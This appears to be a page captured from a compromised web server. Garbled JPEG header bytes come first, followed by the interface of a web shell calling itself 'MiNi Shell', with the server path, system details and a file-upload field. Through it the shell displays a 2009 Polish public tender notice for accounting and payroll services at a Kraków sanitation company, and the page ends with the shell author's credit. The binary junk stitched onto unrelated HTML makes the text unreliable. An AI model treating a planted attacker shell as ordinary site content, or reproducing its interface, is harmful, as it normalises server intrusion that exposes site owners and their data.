JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/22669-N-2009.html

<p class="kh_header"><b>Kraków: Świadczenie usługi w zakresie prowadzenia księgowości (doradztwo podatkowe, prowadzenie ksiąg handlowych i obsługa kadrowo-płacowa) dla Zakładów Sanitarnych w Krakowie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 22669 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakłady Sanitarne w Krakowie spółka z ograniczoną odpowiedzialnością , ul. Śniadeckich 12, 31-531 Kraków, woj. małopolskie, tel. 012 421 18 77, faks 012 421 24 55.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi w zakresie prowadzenia księgowości (doradztwo podatkowe, prowadzenie ksiąg handlowych i obsługa kadrowo-płacowa) dla Zakładów Sanitarnych w Krakowie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Prowadzenie księgowości zgodnie z ustawą o rachunkowości z dnia 29.09.1994r. z uwzględnieniem bieżących zmian wprowadzanych do obowiązujących przepisów finansowych.
2.	Segregowanie tematycznie dowodów księgowych za dany miesiąc.
3.	Dekretowanie przekazanych dokumentów księgowych według ustalonego w spółce planu kont, w tym:
a)	Kontrolowanie przesłanych elektronicznie dowodów księgowych pod względem ich zgodności z przekazanymi oryginałami dokumentów dotyczących zakupu i sprzedaży towarów, materiałów, pozostałych usług oraz dowodami obrotu gotówkowego i bezgotówkowego.
b)	Sporządzanie wewnętrznych dowodów księgowych, niezbędnych do rozliczenia danego miesiąca.
c)	Prowadzenie ewidencji zakupów i sprzedaży VAT
d)	Terminowe i prawidłowe ustalanie wysokości należnych podatków, dochodowego od osób prawnych i podatku VAT.
e)	Terminowe i prawidłowe ustalanie podatku dochodowego od osób fizycznych, będących pracownikami Zleceniodawcy oraz sporządzanie deklaracji podatkowych PIT-4, PIT-8B, PIT-11.
f)	Terminowe składanie wszystkich deklaracji w urzędach skarbowych.
g)	Wypełnianie deklaracji i raportów dotyczących ubezpieczenia społecznego i terminowego ich składania w ZUS.
h)	Bieżące uzgadnianie funkcjonujących kont księgowych.
i)	Sporządzanie rocznego sprawozdania finansowego (bilansu).
j)	Sporządzanie sprawozdań przesłanych przez GUS.
k)	Sporządzanie tabel rozliczeń międzyokresowych biernych i rozliczeń międzyokresowych czynnych za dany rok.
l)	Sporządzanie tabel amortyzacyjnych środków trwałych na dany rok.
m)	Sporządzanie list płac dla pracowników Zleceniodawcy na podstawie przekazanej dokumentacji, obejmujących:
       -Wynagrodzenie zasadnicze,
       -Wynagrodzenie za czas choroby,
       -Wynagrodzenie za godziny nadliczbowe,
       -Premie,
       -Zasiłki chorobowe,
       -Inne składniki wynagrodzenia (ekwiwalenty).
n)	Udzielanie wszelkich wyjaśnień osobom kontrolującym dokumentację finansową spółki.
o)	Prowadzenie ksiąg rachunkowych metodą komputerową zgodnie z obowiązującymi przepisami ustawy o rachunkowości przy użyciu systemu finansowo-księgowego przyjętego w biurze Zleceniobiorcy.
p)	Udostępnienie Zleceniodawcy nieodpłatnie poprzez połączenie terminalowe posiadanego oprogramowania na minimum 7 (siedem) stanowisk, w tym: 
- 1 (jedno) stanowisko w dziale kadr i płac,
- 2 (dwa) stanowiska w dziale księgowości,
- 4 (cztery) stanowiska w dziale handlu, 
zapewniającego poprawne funkcjonowanie firmy Zleceniodawcy w dziedzinie gospodarki magazynowej, kadr i płac oraz księgowości, jak również ewidencji środków trwałych pozwalające na natychmiastową kontrolę nad zarządzaniem Spółki.
q)	   Prowadzenie szkoleń dla pracowników Zamawiającego z obsługi oprogramowania CDN Optima.
r)	 Zapewnienie serwisu informatycznego dla oprogramowania CDN Optima..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.20.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W niniejszym postępowaniu przetargowym mogą wziąć udział wykonawcy nie wykluczeni na podstawie art. 24 ustawy PZP i którzy spełniają wymagania określone w art. 22 ust.1 ustawy PZP i Specyfikacji Istotnych Warunków Zamówienia:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
2.   Wykonawca złoży jedną ofertę pod rygorem nieważności w formie pisemnej.
3.   Treść oferty musi odpowiadać treści SIWZ.   
4.	Złożenie oferty przed upływem terminu składania ofert. 
                                                    	
Oferta zostanie odrzucona, jeżeli będzie niezgodna z ustawą  lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, jej złożenie stanowi czyn nieuczciwej konkurencji, zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia , została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub nie zaproszonego do składania ofert , będzie nieważna na podstawie odrębnych przepisów lub będzie zawierała  omyłki rachunkowe  w obliczeniu ceny, których nie można poprawić na podstawie  art.88 lub błędy w obliczeniu ceny, wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny- art.89  ust 1 ustawy PZP - Dz. U. nr 19 poz.177 z późn. zmianami.
O odrzuceniu oferty zamawiający poinformuje równocześnie wszystkich wykonawców, którzy złożyli oferty  podając uzasadnienie faktyczne i prawne - art.92 ust.1 pkt 2 ustawy PZP .

Zamawiający będzie dokonywał oceny spełniania warunków udziału w postępowaniu na podstawie przedłożonych dokumentów i oświadczeń na zasadzie spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru  lub aktualne zaświadczenie  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (Dz. U nr 87  poz. 605 z 2006).

2. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów , o których mowa w pkt 1 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - ( dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- ( dokument wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
 c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - ( dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2a,b,c, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

3. Formularz ogólny oferty - (załącznik numer 1 do SIWZ)

4. Formularz cenowy oferty - (załącznik numer 2 do SIWZ)

5. Oświadczenie  w zakresie art. 22 ust. 1 i art.24 ust.1 ustawy PZP (załącznik nr 3 do SIWZ).

6. Parafowany wzór umowy - (załącznik numer 4 do SIWZ)

7.Pełnomocnictwo.

8. Polisa ubezpieczeniowa a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Wymagana suma gwarancyjna: 
- ubezpieczenie Podstawowe i Dodatkowe: min. 100 000,00 PLN 
- ubezpieczenie Uzupełniające: min. 50 000,00 PLN
- ubezpieczenie od odpowiedzialności karno-skarbowej: min. 200 00,00 PLN

9. Oświadczenie, że Wykonawca posiada  odpowiednie  zezwolenia na prowadzenie  działalności gospodarczej w zakresie  objętym zamówieniem (w zakresie doradztwa podatkowego, prowadzenia ksiąg handlowych, prowadzenia obsługi kadrowo-płacowej).

10. Dokument potwierdzający wpisanie Wykonawcy na listę Doradców Podatkowych.

11. Dokumenty (referencje, opinie) od poprzednich zamawiających lub zleceniodawców potwierdzające, że Wykonawca posiada przynajmniej 3-letnie doświadczenie zawodowe w zakresie
prowadzenia księgowości ( doradztwo podatkowe, obsługa kadrowo-płacowa, prowadzenie ksiąg handlowych) dla podmiotów publicznych, spółek kapitałowych prawa handlowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakladysanitarne.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ul. Śniadeckich 12, 31-531 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 12:00, miejsce: Ul. Śniadeckich 12, 31-531 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com